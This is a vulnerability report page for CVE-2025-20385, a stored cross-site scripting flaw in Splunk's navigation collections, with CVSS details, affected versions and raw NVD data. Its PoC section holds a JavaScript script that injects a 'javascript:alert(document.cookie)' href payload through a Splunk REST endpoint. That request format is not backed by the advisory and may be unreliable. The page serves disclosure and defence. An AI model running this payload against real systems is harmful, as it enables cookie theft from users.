Security Vulnerability Report
CVE-2025-20385 CVSS 2.4 LOW

CVE-2025-20385

Published: 2025-12-03 17:15:51
Last Modified: 2025-12-05 18:13:11

Description

In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117, a user who holds a role with a high privilege capability `admin_all_objects` could craft a malicious payload through the href attribute of an anchor tag within a collection in the navigation bar, which could result in execution of unauthorized JavaScript code in the browser of a user.

CVSS Details

CVSS Score: 2.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* - VULNERABLE
Splunk Enterprise < 9.2.10
Splunk Enterprise < 9.3.8
Splunk Enterprise < 9.4.6
Splunk Enterprise < 10.0.2
Splunk Cloud Platform < 9.3.2411.117
Splunk Cloud Platform < 10.0.2503.7
Splunk Cloud Platform < 10.1.2507.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-20385 PoC - Splunk Stored XSS in Navigation Collection
// Requires admin_all_objects privilege
const splunkEndpoint = 'https://target-splunk.com:8089/servicesNS/nobody/search/data/ui/collections';
const authToken = 'YOUR_AUTH_TOKEN_HERE';

// Malicious payload for href attribute XSS
const maliciousPayload = {
  "collectionName": "malicious_collection",
  "entry": {
    "name": "evil_link",
    "content": {
      "href": "javascript:alert(document.cookie)",
      "label": "Click Me"
    }
  }
};

async function exploit() {
  try {
    // Step 1: Create malicious collection entry
    const createResponse = await fetch(splunkEndpoint, {
      method: 'POST',
      headers: {
        'Authorization': `Splunk ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify(maliciousPayload)
    });

    if (createResponse.ok) {
      console.log('[+] Malicious collection entry created successfully');
      console.log('[+] XSS payload injected into href attribute');
      console.log('[+] Any user viewing this collection will trigger the XSS');
    }
  } catch (error) {
    console.error('[-] Exploitation failed:', error.message);
  }
}

exploit();

References

https://advisory.splunk.com/advisories/SVD-2025-1204 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20385", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:50.910", "lastModified": "2025-12-05T18:13:10.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117, a user who holds a role with a high privilege capability `admin_all_objects` could craft a malicious payload through the href attribute of an anchor tag within a collection in the navigation bar, which could result in execution of unauthorized JavaScript code in the browser of a user."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise anteriores a 10.0.2, 9.4.6, 9.3.8 y 9.2.10, y en las versiones de Splunk Cloud Platform anteriores a 10.1.2507.6, 10.0.2503.7 y 9.3.2411.117, un usuario que posee un rol con una capacidad de alto privilegio 'admin_all_objects' podría crear una carga útil maliciosa a través del atributo href de una etiqueta de anclaje dentro de una colección en la barra de navegación, lo que podría resultar en la ejecución de código JavaScript no autorizado en el navegador de un usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", 
"userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.117", "matchCriteriaId": "055D722F-3C2C-45FF-B44F-FD73820F2A78"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.7", "matchCriteriaId": "B89283BD-7B81-43D8-84D3-0D9B744E5824"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.6", "matchCriteriaId": "C54FA9B3-9E2A-4D99-8432-C39D3EC79507"}]}]}], "references": [{"url": 
"https://advisory.splunk.com/advisories/SVD-2025-1204", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}